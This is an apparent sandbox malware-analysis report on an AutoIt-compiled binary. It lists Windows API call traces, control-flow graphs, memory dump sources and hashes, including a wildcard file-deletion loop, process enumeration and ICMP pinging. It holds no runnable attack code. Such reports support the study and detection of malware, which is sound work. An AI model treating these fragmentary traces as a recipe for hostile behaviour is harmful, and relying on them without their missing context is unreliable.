                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 006F34BB
                                                                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00733CB0
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 00733CF1
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007B31F4,007C2418,?,?,?,?,?,?,?,006F3368), ref: 00733D7A
                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00733D81
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: GetSysColorBrush.USER32(0000000F), ref: 006F34DE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadCursorW.USER32(00000000,00007F00), ref: 006F34ED
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadIconW.USER32(00000063), ref: 006F3503
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadIconW.USER32(000000A4), ref: 006F3515
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadIconW.USER32(000000A2), ref: 006F3527
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F353F
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: RegisterClassExW.USER32(?), ref: 006F3590
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F35E1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3602
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F3616
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F361F
                                                                                                                                                                                                                                                                                • Part of subcall function 006F396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006F3A3C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                              • String ID: 0$|$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                                                                                              • API String ID: 683915450-569504614
                                                                                                                                                                                                                                                                              • Opcode ID: 6026349b0252b62c7f44a3ffae151bdbf7068380b3958a67ab1b611379443a12
                                                                                                                                                                                                                                                                              • Instruction ID: 433476250f4fcd46185a3ef7747b1ae9891ead704a514a0e1cf3be17d7e0689b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6026349b0252b62c7f44a3ffae151bdbf7068380b3958a67ab1b611379443a12
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C510971148388AAD715EF60DC05DBE7BAAAF84740F00452CF681522A3DF6C9F4AC76A

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              control_flow_graph 1741 75dc54-75dc9b call 6fbf73 * 3 call 6f5851 call 75eab0 1752 75dc9d-75dca6 call 6f6b7c 1741->1752 1753 75dcab-75dcdc call 6f568e FindFirstFileW 1741->1753 1752->1753 1757 75dcde-75dce0 1753->1757 1758 75dd4b-75dd52 FindClose 1753->1758 1757->1758 1759 75dce2-75dce7 1757->1759 1760 75dd56-75dd78 call 6fbd98 * 3 1758->1760 1762 75dd26-75dd38 FindNextFileW 1759->1762 1763 75dce9-75dd24 call 6fbed9 call 6f7bb5 call 6f6b7c DeleteFileW 1759->1763 1762->1757 1766 75dd3a-75dd40 1762->1766 1763->1762 1776 75dd42-75dd49 FindClose 1763->1776 1766->1757 1776->1760
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                                • Part of subcall function 0075EAB0: GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0075DCCB
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0075DD1B
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075DD2C
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075DD43
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075DD4C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                                              • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                              • Opcode ID: 1fa2f6c3315750279f934400a76c8dd3d8aaafcb6f0e69df0e74abaf62465d45
                                                                                                                                                                                                                                                                              • Instruction ID: 04224ee3250416a0da9c2517ccc3aa7ba34a7e31f9a11cfd2faf991c5e8c1e01
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa2f6c3315750279f934400a76c8dd3d8aaafcb6f0e69df0e74abaf62465d45
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A316D310093499FC360EB24C8958EFB7E9BE96301F40495DF9D582191EB65DE0DCB6B
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0075DDAC
                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0075DDBA
                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0075DDDA
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0075DE87
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6b28ad98d0d0a082d4a0a8d20a3363d9e753a2c21f5bd1e174bc9995c54080e4
                                                                                                                                                                                                                                                                              • Instruction ID: a1ea800ff44e4a2f634457ecb2557b257568b6b0175727408d7f94bab8028dc6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b28ad98d0d0a082d4a0a8d20a3363d9e753a2c21f5bd1e174bc9995c54080e4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 073191711083049FD320EF50D885ABFBBE8AF99350F14092DFA81871A1DBB59D49CB96
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                              • Instruction ID: 9f5549e65db97e24c0d0d96638d9956fc2c6b8da8f55bded88fb16011c305591
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4331D374A00105DFC718DF5CD480AA9FBA6FB49300B2486A5E409CB292E7BAEDC1CBC0

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: 4x$@x$Px$`*|$`x$d0b$d10m0$d1b$d1r0,2$d5m0$e#|$i$tx$tx$(|$(|$(|$(|$x$x
                                                                                                                                                                                                                                                                              • API String ID: 0-3624879713
                                                                                                                                                                                                                                                                              • Opcode ID: 8462024d457d66bae347fa58c13de65ba4dadfd70875b4b0a840748f008cdb0c
                                                                                                                                                                                                                                                                              • Instruction ID: 773621f7585be44115d23ad4e57c78b633bb23adc10fb68eb92fb379ca67e715
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8462024d457d66bae347fa58c13de65ba4dadfd70875b4b0a840748f008cdb0c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21625C70508349CFC764DF14C094AAABBE1FF89304F10896EE5998B392DB79E945CF92

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006F3657
                                                                                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 006F3681
                                                                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3692
                                                                                                                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 006F36AF
                                                                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F36BF
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 006F36D5
                                                                                                                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F36E4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                              • String ID: +$0$0+m"o$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                              • API String ID: 2914291525-2075919160
                                                                                                                                                                                                                                                                              • Opcode ID: b70f08b9c8ac2df082646912d9b052e85158e4d61e386f32f3c55ef685e12e17
                                                                                                                                                                                                                                                                              • Instruction ID: a01bb0325f9805a8fe15b70bdeb036381630072118349610856d2e2b07d1eb27
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b70f08b9c8ac2df082646912d9b052e85158e4d61e386f32f3c55ef685e12e17
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4021F4B1D41308AFDB10DFA4EC89B9DBBB4FB08710F20811AF611A62A0D7B95941CF99

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006F3709,?,?), ref: 006F3777
                                                                                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,006F3709,?,?), ref: 006F37A3
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006F37C6
                                                                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006F3709,?,?), ref: 006F37D1
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 006F37E5
                                                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 006F3806
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                              • String ID: 0$|$0$|$TaskbarCreated
                                                                                                                                                                                                                                                                              • API String ID: 129472671-3601538093
                                                                                                                                                                                                                                                                              • Opcode ID: 5eac9a312978c6d904a43d76509e1c8de331d89b4fe01d46e9fe604c0e67a3ee
                                                                                                                                                                                                                                                                              • Instruction ID: e9bc6035d4279c9d5ce46920207f864d109819ab4404408a1ce4e94e3812cc92
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eac9a312978c6d904a43d76509e1c8de331d89b4fe01d46e9fe604c0e67a3ee
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D41A5F12441ACBAEB243B389C49FB93B66E705300F14812DF701993A6DA7C9F46976D

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0073071A: CreateFileW.KERNEL32(00000000,00000000,?,00730A84,?,?,00000000,?,00730A84,00000000,0000000C), ref: 00730737
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00730AEF
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00730AF6
                                                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00730B02
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00730B0C
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00730B15
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00730B35
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00730C7F
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00730CB1
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00730CB8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                              • Opcode ID: 595abe8638acf642a828c8a67f23ce9ea7056ba97a0a00895d8cd9a4298f542b
                                                                                                                                                                                                                                                                              • Instruction ID: 73e1d6c22e9457f1394380584067b279f43ff814ab968a375aa0a4542e6041b5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 595abe8638acf642a828c8a67f23ce9ea7056ba97a0a00895d8cd9a4298f542b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8A11632A041488FEF19AF68EC66BAD7BA0AF06324F14415DF811DB2D2D7399D12CB95

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 006F55B2
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006F525A
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006F53C4
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00734BFD
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00734C3E
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00734C80
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00734CE7
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00734CF6
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                              • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                              • Opcode ID: 45694ad0c10f0b0e0b76dd50b3422d9c383cdc51633e5bcf9b3f4965235573d6
                                                                                                                                                                                                                                                                              • Instruction ID: c9252f4e8b1c0e6667c3c08646d3dc27e84ccc6f1b2f9ac4786359d1a20d3a23
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45694ad0c10f0b0e0b76dd50b3422d9c383cdc51633e5bcf9b3f4965235573d6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9071CF711043449FC704EF29EC85DABBBE8FF88340F40852EF541871A1EB799A48CB9A

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006F34DE
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 006F34ED
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 006F3503
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 006F3515
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 006F3527
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F353F
                                                                                                                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 006F3590
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: GetSysColorBrush.USER32(0000000F), ref: 006F3657
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: RegisterClassExW.USER32(00000030), ref: 006F3681
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3692
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: InitCommonControlsEx.COMCTL32(?), ref: 006F36AF
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F36BF
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: LoadIconW.USER32(000000A9), ref: 006F36D5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F36E4
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                              • Opcode ID: b6c08c0f1b5e66e52c91747a9d47a37e45d42bba70b2ffb20f9766ce6e8330b6
                                                                                                                                                                                                                                                                              • Instruction ID: 50fcb46d72aa64b169a3f956cb5c401ff95ec3ef62c391ce9b3322896b028967
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c08c0f1b5e66e52c91747a9d47a37e45d42bba70b2ffb20f9766ce6e8330b6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40214F70D40398ABDB109FA5EC55FA97FB5FB08750F10802EEA04A62A1D7BD4946CF98

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000101,?), ref: 00771019
                                                                                                                                                                                                                                                                              • inet_addr.WSOCK32(?), ref: 00771079
                                                                                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00771085
                                                                                                                                                                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00771093
                                                                                                                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00771123
